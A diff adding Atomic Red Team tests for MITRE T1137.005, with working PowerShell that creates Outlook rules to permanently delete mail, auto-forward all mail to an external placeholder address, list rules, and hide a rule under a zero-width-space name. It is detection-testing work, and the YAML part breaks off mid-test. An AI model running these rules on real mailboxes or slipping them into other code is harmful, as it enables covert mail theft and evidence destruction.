+$outlook   = New-Object -ComObject Outlook.Application
+$namespace = $outlook.GetNamespace("MAPI")
+$rules     = $namespace.DefaultStore.GetRules()
+$rule      = $rules.Create("#{rule_name}", 0)
+
+$cond = $rule.Conditions.Subject
+$cond.Enabled = $true
+$cond.Text    = @("#{trigger_subject}")
+
+$action         = $rule.Actions.DeletePermanently
+$action.Enabled = $true
+
+$rule.Enabled = $true
+$rules.Save()
+Write-Host "[+] Rule '#{rule_name}' created. Emails with subject '#{trigger_subject}' will be permanently deleted."
+```
+
+#### Cleanup Commands
+
+```powershell
+$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+if ($isAdmin) {
+    Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
+    exit 1
+}
+$outlook   = New-Object -ComObject Outlook.Application
+$namespace = $outlook.GetNamespace("MAPI")
+$rules     = $namespace.DefaultStore.GetRules()
+$removed   = $false
+for ($i = $rules.Count; $i -ge 1; $i--) {
+    if ($rules.Item($i).Name -eq "#{rule_name}") {
+        $rules.Remove($rules.Item($i).Name)
+        $removed = $true
+    }
+}
+if ($removed) {
+    $rules.Save()
+    Write-Host "[+] All instances of rule '#{rule_name}' removed."
+} else {
+    Write-Host "[*] Rule '#{rule_name}' not found - already removed."
+}
+```
+
+#### Dependencies: Run with `powershell`!
+
+##### Description: Classic Outlook must be installed (required for COM automation)
+
+###### Check Prereq Commands
+
+```powershell
+$clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
+if ($clsid) { exit 0 } else { exit 1 }
+```
+
+###### Get Prereq Commands
+
+```powershell
+Write-Host "[-] Classic Outlook is not installed or COM is not registered."
+Write-Host "    Install Microsoft 365 Apps with Classic Outlook before running this test."
+Write-Host "    Note: The new Outlook for Windows does NOT support COM automation."
+exit 1
+```
+
+### Atomic Test #2: Outlook Rule - Sender Address Trigger with DeletePermanently Action via COM Object
+
+Creates an Outlook rule via COM that permanently deletes emails received
+from a specific sender address. Adversaries use sender-based triggers to
+make rules appear more legitimate (e.g. disguised as a filter for a
+specific colleague). Tests a different rule condition path through the
+COM object model. Uses DeletePermanently as it does not require a resolved
+Exchange folder unlike MoveToFolder.
+NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
+session. Outlook COM fails with 0x80080005 when invoked as Administrator.
+
+**Supported Platforms:** Windows
+
+**auto_generated_guid:** `bddfd8d4-7687-4971-b611-50a537ab3ab4`
+
+#### Inputs
+
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| rule_name | Name for the malicious Outlook rule | string | AtomicTest_T1137005_SenderTrigger|
+| trigger_sender | Sender email address that triggers the rule | string | atomictest@redteam.local|
+
+#### Attack Commands: Run with `powershell`!
+
+```powershell
+$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+if ($isAdmin) {
+    Write-Host "[-] This test must be run from a non-elevated PowerShell session."
+    Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
+    exit 1
+}
+
+$outlook   = New-Object -ComObject Outlook.Application
+$namespace = $outlook.GetNamespace("MAPI")
+$rules     = $namespace.DefaultStore.GetRules()
+$rule      = $rules.Create("#{rule_name}", 0)
+
+$cond = $rule.Conditions.From
+$cond.Enabled = $true
+$cond.Recipients.Add("#{trigger_sender}")
+$cond.Recipients.ResolveAll() | Out-Null
+
+$action         = $rule.Actions.DeletePermanently
+$action.Enabled = $true
+
+$rule.Enabled = $true
+$rules.Save()
+Write-Host "[+] Sender-based rule '#{rule_name}' created. Emails from '#{trigger_sender}' will be permanently deleted."
+```
+
+#### Cleanup Commands
+
+```powershell
+$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+if ($isAdmin) {
+    Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
+    exit 1
+}
+$outlook   = New-Object -ComObject Outlook.Application
+$namespace = $outlook.GetNamespace("MAPI")
+$rules     = $namespace.DefaultStore.GetRules()
+$removed   = $false
+for ($i = $rules.Count; $i -ge 1; $i--) {
+    if ($rules.Item($i).Name -eq "#{rule_name}") {
+        $rules.Remove($rules.Item($i).Name)
+        $removed = $true
+    }
+}
+if ($removed) {
+    $rules.Save()
+    Write-Host "[+] All instances of rule '#{rule_name}' removed."
+} else {
+    Write-Host "[*] Rule '#{rule_name}' not found - already removed."
+}
+```
+
+#### Dependencies: Run with `powershell`!
+
+##### Description: Classic Outlook must be installed (required for COM automation)
+
+###### Check Prereq Commands
+
+```powershell
+$clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
+if ($clsid) { exit 0 } else { exit 1 }
+```
+
+###### Get Prereq Commands
+
+```powershell
+Write-Host "[-] Classic Outlook is not installed or COM is not registered."
+Write-Host "    Install Microsoft 365 Apps with Classic Outlook before running this test."
+Write-Host "    Note: The new Outlook for Windows does NOT support COM automation."
+exit 1
+```
+
+### Atomic Test #3: Outlook Rule - Auto-Forward Emails to External Address via COM Object
+
+Creates an Outlook rule that automatically forwards all received emails to
+an external address. Simulates Business Email Compromise (BEC) and insider
+threat scenarios where adversaries establish forwarding rules to exfiltrate
+mail. One of the most commonly observed real-world abuses of Outlook rules.
+Detected by Exchange mail flow anomalies and Microsoft Secure Score
+forwarding alerts.
+NOTE: No actual email is forwarded during this test - the rule is created
+but a trigger email is not sent. Run cleanup immediately after verification.
+NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
+session. Outlook COM fails with 0x80080005 when invoked as Administrator.
+
+**Supported Platforms:** Windows
+
+**auto_generated_guid:** `b0bd3d76-a57c-4699-83f4-8cd798dd09bd`
+
+#### Inputs
+
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| rule_name | Name for the forwarding rule | string | AtomicTest_T1137005_ForwardExfil|
+| forward_to_address | Email address to forward mail to (use a controlled test address) | string | atomictest-exfil@redteam.local|
+
+#### Attack Commands: Run with `powershell`!
+
+```powershell
+$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+if ($isAdmin) {
+    Write-Host "[-] This test must be run from a non-elevated PowerShell session."
+    Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
+    exit 1
+}
+
+$outlook   = New-Object -ComObject Outlook.Application
+$namespace = $outlook.GetNamespace("MAPI")
+$rules     = $namespace.DefaultStore.GetRules()
+$rule      = $rules.Create("#{rule_name}", 0)
+
+$action = $rule.Actions.Forward
+$action.Enabled = $true
+$action.Recipients.Add("#{forward_to_address}")
+$action.Recipients.ResolveAll() | Out-Null
+
+$rule.Enabled = $true
+$rules.Save()
+Write-Host "[+] Auto-forward rule '#{rule_name}' created -> #{forward_to_address}"
+Write-Host "[!] Run cleanup immediately after verifying rule creation in Outlook."
+```
+
+#### Cleanup Commands
+
+```powershell
+$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+if ($isAdmin) {
+    Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
+    exit 1
+}
+$outlook   = New-Object -ComObject Outlook.Application
+$namespace = $outlook.GetNamespace("MAPI")
+$rules     = $namespace.DefaultStore.GetRules()
+$removed   = $false
+for ($i = $rules.Count; $i -ge 1; $i--) {
+    if ($rules.Item($i).Name -eq "#{rule_name}") {
+        $rules.Remove($rules.Item($i).Name)
+        $removed = $true
+    }
+}
+if ($removed) {
+    $rules.Save()
+    Write-Host "[+] All instances of forwarding rule '#{rule_name}' removed."
+} else {
+    Write-Host "[*] Rule '#{rule_name}' not found - already removed."
+}
+```
+
+#### Dependencies: Run with `powershell`!
+
+##### Description: Classic Outlook must be installed (required for COM automation)
+
+###### Check Prereq Commands
+
+```powershell
+$clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
+if ($clsid) { exit 0 } else { exit 1 }
+```
+
+###### Get Prereq Commands
+
+```powershell
+Write-Host "[-] Classic Outlook is not installed or COM is not registered."
+Write-Host "    Install Microsoft 365 Apps with Classic Outlook before running this test."
+Write-Host "    Note: The new Outlook for Windows does NOT support COM automation."
+exit 1
+```
+
+### Atomic Test #4: Outlook Rules - Enumerate Existing Rules via PowerShell COM Object
+
+Enumerates all Outlook rules configured on the local profile using the
+PowerShell COM object. Simulates the discovery phase where an adversary
+audits existing rules before implanting their own, or where a threat actor
+tool such as Ruler lists rules to understand the environment. This
+enumeration should itself generate telemetry - use it to validate that
+your monitoring catches PowerShell spawning Outlook COM for recon purposes.
+NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
+session. Outlook COM fails with 0x80080005 when invoked as Administrator.
+
+**Supported Platforms:** Windows
+
+**auto_generated_guid:** `5ff5249a-5807-480e-ab52-c430497a8a25`
+
+#### Attack Commands: Run with `powershell`!
+
+```powershell
+$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+if ($isAdmin) {
+    Write-Host "[-] This test must be run from a non-elevated PowerShell session."
+    Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
+    exit 1
+}
+
+$outlook = New-Object -ComObject Outlook.Application
+$rules   = $outlook.GetNamespace("MAPI").DefaultStore.GetRules()
+
+Write-Host "`n[*] Enumerating Outlook rules on local profile..."
+Write-Host "    Total rules found: $($rules.Count)`n"
+
+for ($i = 1; $i -le $rules.Count; $i++) {
+    $r = $rules.Item($i)
+    Write-Host "  Rule $i : Name='$($r.Name)' | Enabled=$($r.Enabled)"
+}
+
+if ($rules.Count -eq 0) {
+    Write-Host "  (No rules configured)"
+}
+```
+
+#### Cleanup Commands
+
+```powershell
+Write-Host "[*] No cleanup required for enumeration test."
+```
+
+#### Dependencies: Run with `powershell`!
+
+##### Description: Classic Outlook must be installed (required for COM automation)
+
+###### Check Prereq Commands
+
+```powershell
+$clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
+if ($clsid) { exit 0 } else { exit 1 }
+```
+
+###### Get Prereq Commands
+
+```powershell
+Write-Host "[-] Classic Outlook is not installed or COM is not registered."
+Write-Host "    Install Microsoft 365 Apps with Classic Outlook before running this test."
+Write-Host "    Note: The new Outlook for Windows does NOT support COM automation."
+exit 1
+```
+
+### Atomic Test #5: Outlook Rule - Create Rule with Obfuscated Blank Name (MAPI Evasion)
+
+Creates an Outlook rule with a zero-width space as its display name,
+making it appear blank and invisible in the standard Outlook Rules UI.
+Simulates the hidden inbox rule technique documented by Damian Pfammatter
+(2018) and referenced in MITRE ATT&CK T1137.005 - adversaries use MAPI
+editors or Ruler to blank PR_RULE_MSG_NAME so the rule does not appear
+during casual rule auditing. Tests whether monitoring catches rules that
+are invisible in the Outlook GUI but detectable via MFCMapi or
+Get-InboxRule on Exchange. Uses PlaySound action as RunApplication
+cannot be created programmatically per Microsoft's Rules object model.
+NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
+session. Outlook COM fails with 0x80080005 when invoked as Administrator.
+NOTE: Script is written to a temp file before execution to prevent the
+ART executor's quote-wrapping from mangling the zero-width space bytes.
+
+**Supported Platforms:** Windows
+
+**auto_generated_guid:** `cb814cf8-24f2-41dc-a1cd-1c2073276d4a`
+
+#### Inputs
+
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| trigger_subject | Subject keyword to trigger the hidden rule | string | atomic-rt-hidden|
+| sound_file_path | Path to .wav file used as the rule action payload indicator | string | C:\Windows\Media\notify.wav|
+
+#### Attack Commands: Run with `powershell`!
+
+```powershell
+$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+if ($isAdmin) {
+    Write-Host "[-] This test must be run from a non-elevated PowerShell session."
+    Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
+    exit 1
+}
+$tmpScript = "$env:TEMP\T1137005_hidden_rule_create.ps1"
+$lines = @(
+    '$hiddenName = [System.Text.Encoding]::Unicode.GetString([byte[]](0x0B, 0x20))',
+    '$outlook   = New-Object -ComObject Outlook.Application',
+    '$namespace = $outlook.GetNamespace("MAPI")',
+    '$rules     = $namespace.DefaultStore.GetRules()',
+    '$rule      = $rules.Create($hiddenName, 0)',
+    '$cond = $rule.Conditions.Subject',
+    '$cond.Enabled = $true',
+    '$cond.Text    = @("#{trigger_subject}")',
+    '$action          = $rule.Actions.PlaySound',
+    '$action.Enabled  = $true',
+    '$action.FilePath = "#{sound_file_path}"',
+    '$rule.Enabled = $true',
+    '$rules.Save()',
+    'Write-Host "[+] Hidden rule created with zero-width space name."',
+    'Write-Host "[*] Open Outlook via File -> Manage Rules and Alerts - rule name will appear blank."',
+    'Write-Host "[*] Verify rule exists via PowerShell COM enumeration (Test 4) or Get-InboxRule in Exchange."'
+)
+$lines -join "`n" | Set-Content -Path $tmpScript -Encoding UTF8
+powershell.exe -NoProfile -ExecutionPolicy Bypass -File $tmpScript
+Remove-Item $tmpScript -ErrorAction SilentlyContinue
+```
+
+#### Cleanup Commands
+
+```powershell
+$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+if ($isAdmin) {
+    Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
+    exit 1
+}
+$tmpScript = "$env:TEMP\T1137005_hidden_rule_cleanup.ps1"
+$lines = @(
+    '$hiddenName = [System.Text.Encoding]::Unicode.GetString([byte[]](0x0B, 0x20))',
+    '$outlook    = New-Object -ComObject Outlook.Application',
+    '$namespace  = $outlook.GetNamespace("MAPI")',
+    '$rules      = $namespace.DefaultStore.GetRules()',
+    '$removed    = $false',
+    'for ($i = $rules.Count; $i -ge 1; $i--) {',
+    '    if ($rules.Item($i).Name -eq $hiddenName) {',
+    '        $rules.Remove($rules.Item($i).Name)',
+    '        $removed = $true',
+    '    }',
+    '}',
+    'if ($removed) {',
+    '    $rules.Save()',
+    '    Write-Host "[+] Hidden rule(s) removed."',
+    '} else {',
+    '    Write-Host "[-] Hidden rule not found - may have already been removed."',
+    '}'
+)
+$lines -join "`n" | Set-Content -Path $tmpScript -Encoding UTF8
+powershell.exe -NoProfile -ExecutionPolicy Bypass -File $tmpScript
+Remove-Item $tmpScript -ErrorAction SilentlyContinue
+```
+
+#### Dependencies: Run with `powershell`!
+
+##### Description: Classic Outlook must be installed (required for COM automation)
+
+###### Check Prereq Commands
+
+```powershell
+$clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
+if ($clsid) { exit 0 } else { exit 1 }
+```
+
+###### Get Prereq Commands
+
+```powershell
+Write-Host "[-] Classic Outlook is not installed or COM is not registered."
+Write-Host "    Install Microsoft 365 Apps with Classic Outlook before running this test."
+Write-Host "    Note: The new Outlook for Windows does NOT support COM automation."
+exit 1
+```
+
+##### Description: Sound file must exist for PlaySound action
+
+###### Check Prereq Commands
+
+```powershell
+if (Test-Path "#{sound_file_path}") { exit 0 } else { exit 1 }
+```
+
+###### Get Prereq Commands
+
+```powershell
+Write-Host "[-] Sound file not found at #{sound_file_path}"
+Write-Host "    Specify a valid .wav file path in the sound_file_path input argument."
+exit 1
+```
+

atomics/T1137.005/T1137.005.yaml

@@ -0,0 +1,430 @@
+attack_technique: T1137.005
+display_name: "Office Application Startup: Outlook Rules"
+
+atomic_tests:
+
+# ============================================================
+# TEST 1 — COM Object: Rule Triggers on Subject Keyword
+# ============================================================
+- name: Outlook Rule - Subject Trigger with DeletePermanently Action via COM Object
+  auto_generated_guid: ffadc988-b682-4a68-bd7e-4803666be637
+  description: |
+    Creates a malicious Outlook rule via the COM object that permanently deletes
+    emails when an email with a specific subject keyword arrives. Simulates
+    adversary persistence via Outlook Rules (T1137.005). Uses DeletePermanently
+    action as it does not require a resolved Exchange folder unlike MoveToFolder.
+    NOTE: olRuleActionStartApplication cannot be created programmatically per
+    Microsoft's Rules object model - DeletePermanently is used as the supported
+    equivalent that generates the same rule-creation artefact.
+    NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
+    session. Outlook COM fails with 0x80080005 when invoked as Administrator.
+  supported_platforms:
+    - windows
+  input_arguments:
+    rule_name:
+      description: Name for the malicious Outlook rule
+      type: string
+      default: AtomicTest_T1137005_SubjectTrigger
+    trigger_subject:
+      description: Email subject keyword that triggers the rule
+      type: string
+      default: "atomic-rt-trigger"
+  dependencies:
+    - description: Classic Outlook must be installed (required for COM automation)
+      prereq_command: |
+        $clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
+        if ($clsid) { exit 0 } else { exit 1 }
+      get_prereq_command: |
+        Write-Host "[-] Classic Outlook is not installed or COM is not registered."
+        Write-Host "    Install Microsoft 365 Apps with Classic Outlook before running this test."
+        Write-Host "    Note: The new Outlook for Windows does NOT support COM automation."
+        exit 1
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+      if ($isAdmin) {
+          Write-Host "[-] This test must be run from a non-elevated PowerShell session."
+          Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
+          exit 1
+      }
+
+      $outlook   = New-Object -ComObject Outlook.Application
+      $namespace = $outlook.GetNamespace("MAPI")
+      $rules     = $namespace.DefaultStore.GetRules()
+      $rule      = $rules.Create("#{rule_name}", 0)
+
+      $cond = $rule.Conditions.Subject
+      $cond.Enabled = $true
+      $cond.Text    = @("#{trigger_subject}")
+
+      $action         = $rule.Actions.DeletePermanently
+      $action.Enabled = $true
+
+      $rule.Enabled = $true
+      $rules.Save()
+      Write-Host "[+] Rule '#{rule_name}' created. Emails with subject '#{trigger_subject}' will be permanently deleted."
+    cleanup_command: |
+      $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+      if ($isAdmin) {
+          Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
+          exit 1
+      }
+      $outlook   = New-Object -ComObject Outlook.Application
+      $namespace = $outlook.GetNamespace("MAPI")
+      $rules     = $namespace.DefaultStore.GetRules()
+      $removed   = $false
+      for ($i = $rules.Count; $i -ge 1; $i--) {
+          if ($rules.Item($i).Name -eq "#{rule_name}") {
+              $rules.Remove($rules.Item($i).Name)
+              $removed = $true
+          }
+      }
+      if ($removed) {
+          $rules.Save()
+          Write-Host "[+] All instances of rule '#{rule_name}' removed."
+      } else {
+          Write-Host "[*] Rule '#{rule_name}' not found - already removed."
+      }
+
+
+# ============================================================
+# TEST 2 — COM Object: Rule Triggers on Sender Address
+# ============================================================
+- name: Outlook Rule - Sender Address Trigger with DeletePermanently Action via COM Object
+  auto_generated_guid: bddfd8d4-7687-4971-b611-50a537ab3ab4
+  description: |
+    Creates an Outlook rule via COM that permanently deletes emails received
+    from a specific sender address. Adversaries use sender-based triggers to
+    make rules appear more legitimate (e.g. disguised as a filter for a
+    specific colleague). Tests a different rule condition path through the
+    COM object model. Uses DeletePermanently as it does not require a resolved
+    Exchange folder unlike MoveToFolder.
+    NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
+    session. Outlook COM fails with 0x80080005 when invoked as Administrator.
+  supported_platforms:
+    - windows
+  input_arguments:
+    rule_name:
+      description: Name for the malicious Outlook rule
+      type: string
+      default: AtomicTest_T1137005_SenderTrigger
+    trigger_sender:
+      description: Sender email address that triggers the rule
+      type: string
+      default: "atomictest@redteam.local"
+  dependencies:
+    - description: Classic Outlook must be installed (required for COM automation)
+      prereq_command: |
+        $clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
+        if ($clsid) { exit 0 } else { exit 1 }
+      get_prereq_command: |
+        Write-Host "[-] Classic Outlook is not installed or COM is not registered."
+        Write-Host "    Install Microsoft 365 Apps with Classic Outlook before running this test."
+        Write-Host "    Note: The new Outlook for Windows does NOT support COM automation."
+        exit 1
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+      if ($isAdmin) {
+          Write-Host "[-] This test must be run from a non-elevated PowerShell session."
+          Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
+          exit 1
+      }
+
+      $outlook   = New-Object -ComObject Outlook.Application
+      $namespace = $outlook.GetNamespace("MAPI")
+      $rules     = $namespace.DefaultStore.GetRules()
+      $rule      = $rules.Create("#{rule_name}", 0)
+
+      $cond = $rule.Conditions.From
+      $cond.Enabled = $true
+      $cond.Recipients.Add("#{trigger_sender}")
+      $cond.Recipients.ResolveAll() | Out-Null
+
+      $action         = $rule.Actions.DeletePermanently
+      $action.Enabled = $true
+
+      $rule.Enabled = $true
+      $rules.Save()
+      Write-Host "[+] Sender-based rule '#{rule_name}' created. Emails from '#{trigger_sender}' will be permanently deleted."
+    cleanup_command: |
+      $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+      if ($isAdmin) {
+          Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
+          exit 1
+      }
+      $outlook   = New-Object -ComObject Outlook.Application
+      $namespace = $outlook.GetNamespace("MAPI")
+      $rules     = $namespace.DefaultStore.GetRules()
+      $removed   = $false
+      for ($i = $rules.Count; $i -ge 1; $i--) {
+          if ($rules.Item($i).Name -eq "#{rule_name}") {
+              $rules.Remove($rules.Item($i).Name)
+              $removed = $true
+          }
+      }
+      if ($removed) {
+          $rules.Save()
+          Write-Host "[+] All instances of rule '#{rule_name}' removed."
+      } else {
+          Write-Host "[*] Rule '#{rule_name}' not found - already removed."
+      }
+
+
+# ============================================================
+# TEST 3 — COM Object: Auto-Forward Rule (Exfiltration)
+# ============================================================
+- name: Outlook Rule - Auto-Forward Emails to External Address via COM Object
+  auto_generated_guid: b0bd3d76-a57c-4699-83f4-8cd798dd09bd
+  description: |
+    Creates an Outlook rule that automatically forwards all received emails to
+    an external address. Simulates Business Email Compromise (BEC) and insider
+    threat scenarios where adversaries establish forwarding rules to exfiltrate
+    mail. One of the most commonly observed real-world abuses of Outlook rules.
+    Detected by Exchange mail flow anomalies and Microsoft Secure Score
+    forwarding alerts.
+    NOTE: No actual email is forwarded during this test - the rule is created
+    but a trigger email is not sent. Run cleanup immediately after verification.
+    NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
+    session. Outlook COM fails with 0x80080005 when invoked as Administrator.
+  supported_platforms:
+    - windows
+  input_arguments:
+    rule_name:
+      description: Name for the forwarding rule
+      type: string
+      default: AtomicTest_T1137005_ForwardExfil
+    forward_to_address:
+      description: Email address to forward mail to (use a controlled test address)
+      type: string
+      default: "atomictest-exfil@redteam.local"
+  dependencies:
+    - description: Classic Outlook must be installed (required for COM automation)
+      prereq_command: |
+        $clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
+        if ($clsid) { exit 0 } else { exit 1 }
+      get_prereq_command: |
+        Write-Host "[-] Classic Outlook is not installed or COM is not registered."
+        Write-Host "    Install Microsoft 365 Apps with Classic Outlook before running this test."
+        Write-Host "    Note: The new Outlook for Windows does NOT support COM automation."
+        exit 1
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+      if ($isAdmin) {
+          Write-Host "[-] This test must be run from a non-elevated PowerShell session."
+          Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
+          exit 1
+      }
+
+      $outlook   = New-Object -ComObject Outlook.Application
+      $namespace = $outlook.GetNamespace("MAPI")
+      $rules     = $namespace.DefaultStore.GetRules()
+      $rule      = $rules.Create("#{rule_name}", 0)
+
+      $action = $rule.Actions.Forward
+      $action.Enabled = $true
+      $action.Recipients.Add("#{forward_to_address}")
+      $action.Recipients.ResolveAll() | Out-Null
+
+      $rule.Enabled = $true
+      $rules.Save()
+      Write-Host "[+] Auto-forward rule '#{rule_name}' created -> #{forward_to_address}"
+      Write-Host "[!] Run cleanup immediately after verifying rule creation in Outlook."
+    cleanup_command: |
+      $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+      if ($isAdmin) {
+          Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
+          exit 1
+      }
+      $outlook   = New-Object -ComObject Outlook.Application
+      $namespace = $outlook.GetNamespace("MAPI")
+      $rules     = $namespace.DefaultStore.GetRules()
+      $removed   = $false
+      for ($i = $rules.Count; $i -ge 1; $i--) {
+          if ($rules.Item($i).Name -eq "#{rule_name}") {
+              $rules.Remove($rules.Item($i).Name)
+              $removed = $true
+          }
+      }
+      if ($removed) {
+          $rules.Save()
+          Write-Host "[+] All instances of forwarding rule '#{rule_name}' removed."
+      } else {
+          Write-Host "[*] Rule '#{rule_name}' not found - already removed."
+      }
+
+
+# ============================================================
+# TEST 4 — COM Object: Enumerate All Existing Rules (Discovery)
+# ============================================================
+- name: Outlook Rules - Enumerate Existing Rules via PowerShell COM Object
+  auto_generated_guid: 5ff5249a-5807-480e-ab52-c430497a8a25
+  description: |
+    Enumerates all Outlook rules configured on the local profile using the
+    PowerShell COM object. Simulates the discovery phase where an adversary
+    audits existing rules before implanting their own, or where a threat actor
+    tool such as Ruler lists rules to understand the environment. This
+    enumeration should itself generate telemetry - use it to validate that
+    your monitoring catches PowerShell spawning Outlook COM for recon purposes.
+    NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
+    session. Outlook COM fails with 0x80080005 when invoked as Administrator.
+  supported_platforms:
+    - windows
+  dependencies:
+    - description: Classic Outlook must be installed (required for COM automation)
+      prereq_command: |
+        $clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
+        if ($clsid) { exit 0 } else { exit 1 }
+      get_prereq_command: |
+        Write-Host "[-] Classic Outlook is not installed or COM is not registered."
+        Write-Host "    Install Microsoft 365 Apps with Classic Outlook before running this test."
+        Write-Host "    Note: The new Outlook for Windows does NOT support COM automation."
+        exit 1
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+      if ($isAdmin) {
+          Write-Host "[-] This test must be run from a non-elevated PowerShell session."
+          Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
+          exit 1
+      }
+
+      $outlook = New-Object -ComObject Outlook.Application
+      $rules   = $outlook.GetNamespace("MAPI").DefaultStore.GetRules()
+
+      Write-Host "`n[*] Enumerating Outlook rules on local profile..."
+      Write-Host "    Total rules found: $($rules.Count)`n"
+
+      for ($i = 1; $i -le $rules.Count; $i++) {
+          $r = $rules.Item($i)
+          Write-Host "  Rule $i : Name='$($r.Name)' | Enabled=$($r.Enabled)"
+      }
+
+      if ($rules.Count -eq 0) {
+          Write-Host "  (No rules configured)"
+      }
+    cleanup_command: |
+      Write-Host "[*] No cleanup required for enumeration test."
+    
+
+
+# ============================================================
+# TEST 5 — Hidden Rule: Obfuscated Name (MAPI Evasion)
+# FIX: Write script to a temp .ps1 file and invoke it via
+#      Start-Process to avoid the ART executor's argument
+#      quoting mangling the zero-width space byte sequence.
+# ============================================================
+- name: Outlook Rule - Create Rule with Obfuscated Blank Name (MAPI Evasion)
+  auto_generated_guid: cb814cf8-24f2-41dc-a1cd-1c2073276d4a
+  description: |
+    Creates an Outlook rule with a zero-width space as its display name,
+    making it appear blank and invisible in the standard Outlook Rules UI.
+    Simulates the hidden inbox rule technique documented by Damian Pfammatter
+    (2018) and referenced in MITRE ATT&CK T1137.005 - adversaries use MAPI
+    editors or Ruler to blank PR_RULE_MSG_NAME so the rule does not appear
+    during casual rule auditing. Tests whether monitoring catches rules that
+    are invisible in the Outlook GUI but detectable via MFCMapi or
+    Get-InboxRule on Exchange. Uses PlaySound action as RunApplication
+    cannot be created programmatically per Microsoft's Rules object model.
+    NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
+    session. Outlook COM fails with 0x80080005 when invoked as Administrator.
+    NOTE: Script is written to a temp file before execution to prevent the
+    ART executor's quote-wrapping from mangling the zero-width space bytes.
+  supported_platforms:
+    - windows
+  input_arguments:
+    trigger_subject:
+      description: Subject keyword to trigger the hidden rule
+      type: string
